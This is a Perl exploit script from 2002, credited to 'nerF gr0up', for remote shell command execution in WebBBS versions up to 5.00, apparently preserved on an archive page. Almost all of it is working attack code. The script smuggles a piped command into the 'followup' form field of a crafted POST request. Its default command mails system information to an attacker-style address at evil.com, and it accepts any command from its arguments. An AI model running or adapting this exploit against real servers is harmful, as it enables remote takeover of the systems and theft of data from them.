home *** CD-ROM | disk | FTP | other *** search
- #!/usr/bin/perl
- #
- # nerF gr0up
- #
- # exploit code for
- # WebBBS by Darryl C. Burgdorf
- # all version up to 5.00 are vulnerable
- #
- #
- # this is an exploitation of "followup" bug.
- # it allows remote attacker to execute shell
- commands.
- # you can find WebBBS script at
- http://awsd.com/scripts/webbbs/
- #
- # 06.06.2002
- # btr // nerf
- # nerf.ru
-
- use IO::Socket;
-
- srand();
- $script = "/cgi-bin/webbbs/webbbs_config.pl";
- $command = "uname -a|mail zlo@evil.com";
- $host = "localhost";
- $port = 80;
-
- $content = "$content" . "name=" . rand(254);
- $content = "$content" . "&email=" . rand(254);
- $content = "$content" . "&subject=" .
- rand(254);
- $content = "$content" . "&body=" . rand(254);
-
- $content="$content"."&followup=".rand(254)."|$command|";
-
- $content_length = length($content);
- $content_type =
- "application/x-www-form-urlencoded";
-
- if (@ARGV[0]) {$command=@ARGV[0];}
- if (@ARGV[1]) {$host=@ARGV[1];}
- if (@ARGV[2]) {$script=@ARGV[2];}
-
- $buf = "POST " . "$script" . "?post
- HTTP/1.0\n";
- $buf = "$buf" . "Content-Type:
- $content_type\r\nContent-Length:";
- $buf = "$buf" .
- "$content_length\r\n\r\n$content", 0;
-
- print "\tnerF gr0up\n";
- print "exploit: WebBBS (awsd.com), version up
- to 5.00\n";
-
- print "sent:\n$buf\n";
-
- if($socket = IO::Socket::INET->new("$host:$port")){
-
- print $socket "$buf";
- read($socket,$buf,1500);
- print "recieved:\n$buf\n";
- }
-
-